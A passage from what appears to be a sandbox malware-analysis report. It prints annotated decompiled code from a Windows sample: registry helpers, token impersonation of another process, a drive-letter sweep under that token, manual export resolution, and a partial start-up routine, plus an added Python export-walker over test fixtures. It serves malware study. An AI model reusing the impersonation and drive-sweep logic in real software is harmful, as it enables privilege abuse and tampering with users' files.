            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Enum$CloseOpen
            • String ID:
            • API String ID: 1701607978-0
            • Opcode ID: 39a233d05302e7c2570b6b299103510263263b2e9d10d7028aa9cb9319db9fae
            • Instruction ID: 911e4a3c8306a551e4c13c3bdd5262b30ee9d0628da32002f0a0cf422f999a2d
            • Opcode Fuzzy Hash: 39a233d05302e7c2570b6b299103510263263b2e9d10d7028aa9cb9319db9fae
            • Instruction Fuzzy Hash: 8C419F71908209BEEB21DFE4DE45FFEB7BCEF85720F200629F910A6191E7709A509B54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            (rendered graph not reproduced; basic blocks 9b558b-9b5608, calls to 9b494c and 9b4999, API calls RegOpenKeyExW, RegQueryValueExW and RegCloseKey)
            C-Code - Quality: 100%
            			// Read a registry value into a freshly allocated buffer. _a4 = root key, _a8 = subkey,
            			// _a12 = value name, _a16 receives the value type, _a20 receives the size.
            			// Returns the buffer (the caller frees it with E009B4999) or 0.
            			E009B558B(void* _a4, short* _a8, short* _a12, int* _a16, int* _a20) {
            				void* _v8;
            				long _t13;
            				long _t15;
            				long _t18;
            				int* _t27;
            				char* _t30;
            
            				_t30 = 0;
            				_t13 = RegOpenKeyExW(_a4, _a8, 0, 1,  &_v8); // 1 = KEY_QUERY_VALUE; executed
            				if(_t13 != 0) {
            					L7:
            					return _t30;
            				}
            				_t27 = _a20;
            				_t15 = RegQueryValueExW(_v8, _a12, 0, _a16, 0, _t27); // first call with no buffer: size probe; executed
            				if(_t15 == 0 &&  *_t27 != 0) {
            					_t30 = E009B494C( *_t27); // heap allocation wrapper
            					if(_t30 != 0) {
            						_t18 = RegQueryValueExW(_v8, _a12, 0, _a16, _t30, _t27); // second call fills the buffer; executed
            						if(_t18 != 0) {
            							E009B4999(_t30); // free on failure so the caller only ever sees a valid buffer or 0
            							_t30 = 0;
            						}
            					}
            				}
            				RegCloseKey(_v8); // executed
            				goto L7;
            			}


            APIs
            • RegOpenKeyExW.KERNELBASE(0000000C,00000007,00000000,00000001,?,009C0270,00000000,?,?,009B2342,80000002,?,?,?,?,009C0270), ref: 009B55A2
            • RegQueryValueExW.KERNELBASE(?,00000CA1,00000000,009C0270,00000000,?,80000002,?,?,009B2342,80000002,?,?,?,?,009C0270), ref: 009B55BC
            • RegCloseKey.KERNELBASE(?,?,?,009B2342,80000002,?,?,?,?,009C0270,00000CA1,00000007,0000000C,?), ref: 009B55FA
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • RegQueryValueExW.KERNELBASE(?,00000CA1,00000000,009C0270,00000000,?,?,?,009B2342,80000002,?,?,?,?,009C0270,00000CA1), ref: 009B55E4
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: HeapQueryValue$CloseCreateOpenProcess
            • String ID:
            • API String ID: 3348224683-0
            • Opcode ID: 934c331c5b6fef952eef21abba2614c0a75108fb18000287ba6fa04dd37739bc
            • Instruction ID: 7fbbb810b2677ae21f69bd84a9192761fc870bf12747eebbd3cd04261c207410
            • Opcode Fuzzy Hash: 934c331c5b6fef952eef21abba2614c0a75108fb18000287ba6fa04dd37739bc
            • Instruction Fuzzy Hash: C701923251420ABFEF214F91DD44EEFBB7EEF457A5B050069F90092120C7728E20ABA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Impersonate another process's token: decode a process name from the embedded string
            			// table, resolve it to a PID (E009B508A), open the process with MAXIMUM_ALLOWED and
            			// impersonate its primary token in the calling thread. Returns 1 on success, else 0.
            			E009B5162(void* __ecx, void* __eflags) {
            				void* _v8;
            				short _v12;
            				char _v36;
            				long _t13;
            				int _t17;
            				void* _t24;
            				void* _t28;
            
            				_t24 = __ecx;
            				E009B5E33(0x9c1338, 0x199, 0x10, 0x18,  &_v36); // decode 0x18 bytes (12 WCHARs) of process name into _v36
            				_v12 = 0; // terminate it
            				_t13 = E009B508A(_t24,  &_v36); // process name -> PID (its result is the dwProcessId below); executed
            				_t28 = OpenProcess(0x2000000, 0, _t13); // 0x2000000 = MAXIMUM_ALLOWED, handle not inheritable
            				if(_t28 != 0) {
            					if(OpenProcessToken(_t28, 0xf01ff,  &_v8) != 0) { // 0xf01ff = TOKEN_ALL_ACCESS
            						_t17 = ImpersonateLoggedOnUser(_v8); // the calling thread now runs under that process's user; executed
            						E009B4BEE(_t28); // handle-close wrapper: the sandbox resolves it to FindCloseChangeNotification, which shares CloseHandle's kernelbase entry point
            						E009B4BEE(_v8);
            						return 0 | _t17 != 0x00000000;
            					}
            					E009B4BEE(_t28);
            				}
            				return 0;
            			}


            APIs
            • OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,00000001), ref: 009B519A
            • OpenProcessToken.ADVAPI32(00000000,000F01FF,009B7A11,?,?,?,?,?,00000001), ref: 009B51B4
            • ImpersonateLoggedOnUser.KERNELBASE(009B7A11,00000000,?,?,?,?,?,00000001,?,?,?,?,?,?,?,009B7A11), ref: 009B51CB
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: OpenProcess$ChangeCloseFindImpersonateLoggedNotificationTokenUser
            • String ID:
            • API String ID: 2998948061-0
            • Opcode ID: 1bf5b3431cfaea156d4c49fc4ca98e57cc3ec51f8b0136c05632c970eca3a3e7
            • Instruction ID: b8a43588db3292012aaa2b8432e0c21f31782f5783a8b84a941540da8a242565
            • Opcode Fuzzy Hash: 1bf5b3431cfaea156d4c49fc4ca98e57cc3ec51f8b0136c05632c970eca3a3e7
            • Instruction Fuzzy Hash: 69014C36A882197BE71177B88E06FFE737CDF88730F100429FA05E2082EA60D91063A0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Registry write helper: create or open subkey _a8 under root _a4 with
            			// samDesired 2 (KEY_SET_VALUE), then store value _a12 of type _a16
            			// (E009B1DBB passes 3 = REG_BINARY) from the _a24-byte buffer _a20.
            			E009B5609(void* __ecx, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
            				void* _v8;     // opened key
            				long _t11;
            				int _t19;      // 1 only if the value was written
            
            				_t19 = 0;
            				_t11 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, 2, 0,  &_v8, 0); // executed
            				if(_t11 == 0) {
            					// The decompiler dropped the operand of this compare; the tested value is
            					// the RegSetValueExW result (ERROR_SUCCESS == 0).
            					_t19 = RegSetValueExW(_v8, _a12, 0, _a16, _a20, _a24) == 0 ? 1 : 0; // executed
            					RegCloseKey(_v8); // executed
            				}
            				return _t19;
            			}

            Instruction addresses (one per decompiled line, in order): 0x009b560e, 0x009b5621, 0x009b5629, 0x009b563b, 0x009b5649, 0x009b564c, 0x009b564c, 0x009b5658

            APIs
            • RegCreateKeyExW.KERNELBASE(00000000,009C21A0,00000000,00000000,00000000,00000002,00000000,009B18EE,00000000,00000000,?,?,009B2567,80000002,?,?), ref: 009B5621
            • RegSetValueExW.KERNELBASE(009B18EE,?,00000000,00000000,009C21F8,?,?,?,009B2567,80000002,?,?,00000003,009C2160,?,009C21F8), ref: 009B563B
            • RegCloseKey.KERNELBASE(009B18EE,?,?,009B2567,80000002,?,?,00000003,009C2160,?,009C21F8,00000000,?,009C21A0,00000000,009B18EE), ref: 009B564C
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateValue
            • String ID:
            • API String ID: 1818849710-0
            • Opcode ID: a943cc50098fc594604e7ec670a8172683c5c98e6dd76adc8b1cc173c944ffbd
            • Instruction ID: c8124dfc542b2d4dbaa705e7f022cb4beb52e1d98f2b73da232d3f4f144b3546
            • Opcode Fuzzy Hash: a943cc50098fc594604e7ec670a8172683c5c98e6dd76adc8b1cc173c944ffbd
            • Instruction Fuzzy Hash: 83F0DA36515129BBDF215F92DD09EDB7F6DEF0A2A1B404065FA0991021D6328A20EBE4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// MoveFileW with one retry: when the move fails with
            			// ERROR_PATH_NOT_FOUND (3), impersonate the target process's token
            			// through E009B5162 and try the same move again.
            			E009B7989(WCHAR* _a4, WCHAR* _a8) {
            				int _t5;
            				long _t7;      // last error
            				void* _t8;
            				void* _t10;
            				int _t11;      // MoveFileW result
            				long _t13;     // flags operand passed on to E009B5162
            
            				_t5 = MoveFileW(_a4, _a8); // executed
            				_t11 = _t5;
            				if(_t11 != 0) {
            					L4:
            					return _t11;
            				}
            				_t7 = RtlGetLastWin32Error();
            				_t13 = _t7 - 3;
            				if(_t7 != 3) {     // anything but ERROR_PATH_NOT_FOUND: give up
            					goto L4;
            				}
            				_t8 = E009B5162(_t10, _t13);
            				if(_t8 != 0) {
            					_t11 = MoveFileW(_a4, _a8);   // retried under the impersonated token
            					goto L4;
            				}
            				return _t8;
            			}

            Instruction addresses (one per decompiled line, in order; 0x00000000 = no address): 0x009b7993, 0x009b7999, 0x009b799d, 0x009b79c0, 0x00000000, 0x009b79c0, 0x009b799f, 0x009b79a4, 0x009b79a7, 0x00000000, 0x00000000, 0x009b79a9, 0x009b79b0, 0x009b79be, 0x00000000, 0x009b79be, 0x009b79c4

            APIs
            • MoveFileW.KERNEL32(00000000,50C2440F), ref: 009B7993
            • RtlGetLastWin32Error.NTDLL ref: 009B799F
              • Part of subcall function 009B5162: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,00000001), ref: 009B519A
            • MoveFileW.KERNEL32(00000000,50C2440F), ref: 009B79B8
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: FileMove$ErrorLastOpenProcessWin32
            • String ID:
            • API String ID: 1545481861-0
            • Opcode ID: 42acd5cb1ca0eefb8bb232e63413c70db87826cbd8e75dab92bd9ceb3d8258c3
            • Instruction ID: 400a31b496cc3ebd44028a82dbf181cb9e22c881b65ba25ca302042f72e302e9
            • Opcode Fuzzy Hash: 42acd5cb1ca0eefb8bb232e63413c70db87826cbd8e75dab92bd9ceb3d8258c3
            • Instruction Fuzzy Hash: 5BE08635905518A78F212BF8DD04AC97F5DDF493F0B014220FD18C6221C731CD6097D0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Manual export resolution (the sample's GetProcAddress stand-in):
            			// LoadLibraryA the module, check the MZ and PE signatures, compare
            			// every entry of the export name table with lstrcmpA, and map the
            			// matching ordinal to a function RVA. An RVA that falls inside the
            			// export directory is a forwarder string "DLL.Symbol"; it is split at
            			// the '.' and resolved by calling this function again. There is no
            			// check that the export directory RVA is non-zero.
            			E009B6C81(CHAR* _a4, CHAR* _a8) {
            				signed int _v8;               // index into the name table
            				intOrPtr _v12;                // AddressOfNames (absolute)
            				intOrPtr _v16;                // AddressOfNameOrdinals (absolute)
            				intOrPtr _v20;                // AddressOfFunctions (absolute)
            				struct HINSTANCE__* _t32;
            				signed int _t36;
            				void* _t37;                   // result
            				int _t40;
            				signed int _t41;
            				char* _t46;                   // writable copy of the forwarder string
            				char* _t47;                   // position of the '.' in that copy
            				void* _t48;
            				void* _t53;                   // IMAGE_EXPORT_DIRECTORY (absolute)
            				intOrPtr _t57;
            				intOrPtr _t62;                // function RVA
            				intOrPtr* _t66;               // IMAGE_NT_HEADERS (absolute)
            				struct HINSTANCE__* _t69;     // module base
            				char* _t29;                   // forwarder symbol, after the '.'
            				void* _t68;
            
            				E009B70D1(0x69335005);        // helper called with a constant; not shown on this page
            				_t32 = LoadLibraryA(_a4); // executed
            				_t69 = _t32;
            				if(_t69->i == 0x5a4d) {                                  // 'MZ'
            					_t66 =  *((intOrPtr*)(_t69 + 0x3c)) + _t69;          // e_lfanew
            					__eflags =  *_t66 - 0x4550;
            					if( *_t66 == 0x4550) {                               // 'PE\0\0'
            						_t53 =  *((intOrPtr*)(_t66 + 0x78)) + _t69;      // DataDirectory[EXPORT].VirtualAddress
            						_v20 =  *((intOrPtr*)(_t53 + 0x1c)) + _t69;      // AddressOfFunctions
            						_t57 =  *((intOrPtr*)(_t53 + 0x20)) + _t69;      // AddressOfNames
            						_t36 = 0;
            						_v12 = _t57;
            						_v8 = 0;
            						__eflags =  *(_t53 + 0x18);                       // NumberOfNames
            						if( *(_t53 + 0x18) <= 0) {
            							L7:
            							_t37 = 0;                                     // name not found
            							__eflags = 0;
            							L8:
            							L9:
            							return _t37;
            						} else {
            							goto L5;
            						}
            						while(1) {
            							L5:
            							_v16 =  *((intOrPtr*)(_t53 + 0x24)) + _t69;  // AddressOfNameOrdinals
            							_t40 = lstrcmpA(_a8,  *((intOrPtr*)(_t57 + _t36 * 4)) + _t69); // executed
            							__eflags = _t40;
            							_t41 = _v8;
            							if(_t40 == 0) {
            								break;                                    // match at name index _t41
            							}
            							_t57 = _v12;
            							_t36 = _t41 + 1;
            							_v8 = _t36;
            							__eflags = _t36 -  *(_t53 + 0x18);
            							if(_t36 <  *(_t53 + 0x18)) {
            								continue;
            							}
            							goto L7;
            						}
            						// ordinal -> RVA: AddressOfFunctions[AddressOfNameOrdinals[index]]
            						_t62 =  *((intOrPtr*)(_v20 + ( *(_v16 + _t41 * 2) & 0x0000ffff) * 4));
            						__eflags = _t62 -  *((intOrPtr*)(_t66 + 0x78));
            						if(_t62 <  *((intOrPtr*)(_t66 + 0x78))) {
            							L14:
            							_t37 = _t62 + _t69;                           // ordinary export: base + RVA
            							goto L8;
            						}
            						__eflags = _t62 -  *((intOrPtr*)(_t66 + 0x7c)) +  *((intOrPtr*)(_t66 + 0x78));
            						if(__eflags >= 0) {
            							goto L14;                                     // RVA past the directory end: ordinary export
            						}
            						// RVA inside [export RVA, export RVA + size): forwarder "DLL.Symbol"
            						_t68 = E009B73D8(__eflags, _t62 + _t69);          // copy the string; _t46 is that copy
            						_t47 = E009B6137(_t46, 0x2e);                     // locate the '.'
            						_t29 = _t47 + 1; // 0x1                           // symbol part
            						 *_t47 = 0;                                       // terminate the DLL name
            						_t48 = E009B6C81(_t46, _t29);                     // recurse into the forwarded module
            						E009B4999(_t68);                                  // free the copy (counterpart of E009B494C)
            						_t37 = _t48;
            						goto L8;
            					}
            					_t37 = 0;
            					goto L9;
            				}
            				return 0;
            			}

            Instruction addresses (one per decompiled line, in order; 0x00000000 = no address): 0x009b6c90, 0x009b6c96, 0x009b6c98, 0x009b6ca2, 0x009b6cac, 0x009b6cae, 0x009b6cb4, 0x009b6cbe, 0x009b6cc8, 0x009b6ccb, 0x009b6ccd, 0x009b6ccf, 0x009b6cd2, 0x009b6cd5, 0x009b6cd8, 0x009b6d04, 0x009b6d04, 0x009b6d04, 0x009b6d06, 0x009b6d07, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009b6cda, 0x009b6cda, 0x009b6ce8, 0x009b6ceb, 0x009b6cf1, 0x009b6cf3, 0x009b6cf6, 0x00000000, 0x00000000, 0x009b6cf8, 0x009b6cfb, 0x009b6cfc, 0x009b6cff, 0x009b6d02, 0x00000000, 0x00000000, 0x00000000, 0x009b6d02, 0x009b6d17, 0x009b6d1a, 0x009b6d1d, 0x009b6d58, 0x009b6d58, 0x00000000, 0x009b6d58, 0x009b6d25, 0x009b6d27, 0x00000000, 0x00000000, 0x009b6d32, 0x009b6d37, 0x009b6d3c, 0x009b6d3f, 0x009b6d44, 0x009b6d4c, 0x009b6d54, 0x00000000, 0x009b6d54, 0x009b6cb6, 0x00000000, 0x009b6cb6, 0x00000000

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6C96
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 615ae9f44a3a99f0a0d59240483a2fb26521b84891effc3a7bcf38abd1125ff1
            • Instruction ID: 43dc514fff4ac8de1345f6379aa12b290c94bd2e3c6f8b955d60e6482aa4be10
            • Opcode Fuzzy Hash: 615ae9f44a3a99f0a0d59240483a2fb26521b84891effc3a7bcf38abd1125ff1
            • Instruction Fuzzy Hash: F531BF70A00114AFCB14EF68CE81ABDB7F9EF88720B24049AE845D7642E779F951DB90
            Uniqueness

            Uniqueness Score: -1.00%
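            The export walk in E009B6C81 above is the sample's own replacement for GetProcAddress. The Python below is an added example, not code from the sample or from the Joe Sandbox report: it performs the same walk (MZ/PE checks, export directory from DataDirectory[0] at NT header + 0x78/0x7c, linear scan of the name table, ordinal to RVA, forwarder recursion when the RVA lies inside the export directory) over an in-memory PE32 image. It goes slightly beyond the sample by rejecting a null export directory, bounding forwarder loops and accepting ordinal forwarders of the form "DLL.#n". build_image constructs a fixture image that fills only the fields the walker reads; the module names, base addresses and export names in MODULES are made up for the test and stand in for what LoadLibraryA would return.

```python
import struct

def _u16(img, off): return struct.unpack_from("<H", img, off)[0]
def _u32(img, off): return struct.unpack_from("<I", img, off)[0]
def _cstr(img, off): return img[off:img.index(b"\0", off)].decode()

def resolve_export(modules, dll, symbol, depth=0):
    """Walk the export table of `dll` like E009B6C81 and return the absolute
    address of `symbol`, following forwarders through `modules`.
    `modules` maps an upper-case module name to (image base, image bytes) and
    stands in for LoadLibraryA. Returns None when nothing resolves."""
    if depth > 8 or dll not in modules:
        return None                                   # unknown DLL or forwarder loop
    base, img = modules[dll]
    if img[:2] != b"MZ":
        return None
    nt = _u32(img, 0x3C)                              # e_lfanew
    if img[nt:nt + 4] != b"PE\0\0":
        return None
    exp_rva, exp_size = _u32(img, nt + 0x78), _u32(img, nt + 0x7C)
    if exp_rva == 0:
        return None                                   # no export table (the sample skips this check)
    ordinal_base = _u32(img, exp_rva + 0x10)
    n_funcs, n_names = _u32(img, exp_rva + 0x14), _u32(img, exp_rva + 0x18)
    funcs, names, ords = (_u32(img, exp_rva + o) for o in (0x1C, 0x20, 0x24))
    if symbol.startswith("#"):                        # "#n": forwarder by ordinal
        index = int(symbol[1:]) - ordinal_base
        if not 0 <= index < n_funcs:
            return None
    else:
        for i in range(n_names):                      # the sample's lstrcmpA loop (case-sensitive)
            if _cstr(img, _u32(img, names + 4 * i)) == symbol:
                index = _u16(img, ords + 2 * i)
                break
        else:
            return None
    target = _u32(img, funcs + 4 * index)
    if exp_rva <= target < exp_rva + exp_size:        # RVA inside the directory: forwarder string
        fwd_dll, _, fwd_sym = _cstr(img, target).partition(".")
        return resolve_export(modules, fwd_dll.upper(), fwd_sym, depth + 1)
    return base + target

def build_image(exports, ordinal_base=1, export_rva=0x200, size=0x300):
    """Constructed PE32 image containing only the fields the walker reads; not a
    real DLL. `exports` is a list of (name, rva) or (name, "DLL.Symbol")."""
    img = bytearray(size)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                   # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", img, 0x58, 0x10B)                  # PE32 optional-header magic
    n = len(exports)
    funcs = export_rva + 0x28                                 # tables follow the 40-byte directory
    names, ords = funcs + 4 * n, funcs + 8 * n
    cursor = ords + 2 * n                                     # strings after the tables
    for i, (name, target) in enumerate(exports):
        struct.pack_into("<I", img, names + 4 * i, cursor)
        img[cursor:cursor + len(name) + 1] = name.encode() + b"\0"
        cursor += len(name) + 1
        if isinstance(target, str):                           # forwarder text lives inside the directory
            struct.pack_into("<I", img, funcs + 4 * i, cursor)
            img[cursor:cursor + len(target) + 1] = target.encode() + b"\0"
            cursor += len(target) + 1
        else:
            struct.pack_into("<I", img, funcs + 4 * i, target)
        struct.pack_into("<H", img, ords + 2 * i, i)
    struct.pack_into("<II", img, 0xB8, export_rva, cursor - export_rva)   # DataDirectory[EXPORT]
    struct.pack_into("<IIIIII", img, export_rva + 0x10, ordinal_base, n, n, funcs, names, ords)
    return bytes(img)

# Fixture (hypothetical modules and addresses): MAIN forwards "Fwd" to OTHER!Real.
MAIN = build_image([("Alpha", 0x1000), ("Fwd", "OTHER.Real"), ("Zeta", 0x1010)])
OTHER = build_image([("Real", 0x1234)], ordinal_base=5)
MODULES = {"MAIN": (0x10000000, MAIN), "OTHER": (0x20000000, OTHER)}

if __name__ == "__main__":
    for sym in ("Alpha", "Fwd", "Zeta", "Nope"):
        addr = resolve_export(MODULES, "MAIN", sym)
        print(sym, hex(addr) if addr is not None else None)
```

The forwarder test is the part worth keeping in mind when reading the decompiled branch at 0x009b6d25: the sample decides "forwarder or not" purely from whether the RVA falls inside the export directory range, so an image whose export directory size is wrong (a packed or tampered module) sends it down the recursion path with a non-string target.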

            C-Code - Quality: 95%
            			// Drive sweep under the impersonated token. A 0xfffe-byte path buffer is
            			// allocated (E009B494C), a 0xe-byte (7 WCHAR) path template is decoded
            			// into it, E009B5162 impersonates, and the WCHAR at index 4 is stepped
            			// as the drive letter up to 'Z' (0x5a). Drives whose type is 2..4
            			// (DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_REMOTE, assuming the compare is
            			// unsigned as the "type - 2" idiom implies) are handed to E009B766A
            			// together with _a4; RevertToSelf ends the impersonation afterwards.
            			E009B79C5(int _a4) {
            				short _v6;      // NUL terminator for the template
            				char _v20;      // decoded 0xe-byte template
            				WCHAR* _t11;
            				int _t18;       // GetDriveTypeW result
            				signed int _t26;
            				short _t27;
            				void* _t28;
            				void* _t33;     // 'Z'
            				WCHAR* _t35;    // path buffer
            				void* _t38;
            
            				_t11 = E009B494C(0xfffe);
            				_t35 = _t11;
            				_pop(_t28);
            				_t38 = _t35;
            				if(_t35 == 0) {
            					return _t11;                                // allocation failed
            				} else {
            					E009B5E33(0x9c1338, 0x38c, 0x10, 0xe,  &_v20);
            					_v6 = 0;
            					E009B61F8(_t35,  &_v20);                    // copy the template into the buffer
            					E009B5162(_t28, _t38); // executed          // impersonate; result not checked
            					_t33 = 0x5a;
            					while(_t35[4] <= _t33) {                    // drive letter loop up to 'Z'
            						_t18 = GetDriveTypeW(_t35); // executed
            						__eflags = _t18 + 0xfffffffe - 2;
            						if(_t18 + 0xfffffffe <= 2) {            // type - 2 <= 2
            							 *0x9c1d80 =  *0x9c1d80 & 0x00000000;   // per-drive global reset (purpose not shown here)
            							E009B766A(_t35, _a4); // executed       // process this drive
            							_t26 = _t35[4] & 0x0000ffff;
            							__eflags = _t26 - 0x61;
            							if(_t26 >= 0x61) {                  // 'a'..'z' -> upper case via & 0xffdf
            								__eflags = _t26 - 0x7a;
            								if(_t26 <= 0x7a) {
            									_t27 = _t26 & 0x0000ffdf;
            									__eflags = _t27;
            									_t35[4] = _t27;
            								}
            							}
            						}
            						_t35[4] = _t35[4] + 1;                  // next letter
            						__eflags = 0;
            						_t35[7] = 0;                            // restore the 7-WCHAR template
            					}
            					RevertToSelf(); // executed
            					E009B4999(_t35);                            // free the buffer
            					return 1;
            				}
            			}

            Instruction addresses (one per decompiled line, in order; 0x00000000 = no address): 0x009b79d1, 0x009b79d6, 0x009b79d8, 0x009b79d9, 0x009b79db, 0x009b7a72, 0x009b79e1, 0x009b79f4, 0x009b79fb, 0x009b7a04, 0x009b7a0c, 0x009b7a13, 0x009b7a58, 0x009b7a17, 0x009b7a20, 0x009b7a23, 0x009b7a28, 0x009b7a30, 0x009b7a35, 0x009b7a3b, 0x009b7a3e, 0x009b7a40, 0x009b7a43, 0x009b7a45, 0x009b7a45, 0x009b7a4a, 0x009b7a4a, 0x009b7a43, 0x009b7a3e, 0x009b7a4e, 0x009b7a52, 0x009b7a54, 0x009b7a54, 0x009b7a5e, 0x009b7a64, 0x00000000, 0x009b7a6d

            APIs
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
              • Part of subcall function 009B5162: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,00000001), ref: 009B519A
            • GetDriveTypeW.KERNELBASE(00000000,?,?,?,?,?,00000001,00000000,?,?,009B34D4,?,?,?,00000000,00000000), ref: 009B7A17
            • RevertToSelf.ADVAPI32(?,?,?,?,?,00000001,00000000,?,?,009B34D4,?,?,?,00000000,00000000), ref: 009B7A5E
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: HeapProcess$CreateDriveOpenRevertSelfType
            • String ID:
            • API String ID: 3515759238-0
            • Opcode ID: 944a83d2e17ce3cf6dac09f2003e3fba9b7b472a46e0ef97b95c4d48a1515383
            • Instruction ID: 72a2e9c7cae748348738d285de3f8609163410d1c2dcf971d1a868faee98c8f5
            • Opcode Fuzzy Hash: 944a83d2e17ce3cf6dac09f2003e3fba9b7b472a46e0ef97b95c4d48a1515383
            • Instruction Fuzzy Hash: 46114C32958B1566D320B7E8DD02FFFB3A8DF82731F104A2AF455D55D2E660D640839A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			// Start-up sequence. E009B1500 and the global at 0x9c22f4 (together with
            			// E009B5204, the keyboard-layout check listed in the APIs below) select
            			// the E009B4C87 exit path; then SetErrorMode(1 = SEM_FAILCRITICALERRORS),
            			// a version-style check (E009B5408() >= 0x600), SHTestTokenMembership
            			// through the import slot at 0x9c1228 (RID 0x12, see the API list), the
            			// single-instance mutex E009B52D4 gated by the global at 0x9c230c (the
            			// branch behind the "may stop execution after checking mutex"
            			// signature), and finally the main worker E009B37A8.
            			E009B437D(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
            				void* _t2;
            				void* _t5;
            				void* _t8;
            				void* _t10;
            				void* _t14;
            				void* _t15;
            				void* _t20;
            				intOrPtr _t24;
            				intOrPtr _t29;
            
            				_t20 = __edi;
            				_t15 = __ecx;
            				_t14 = __ebx;
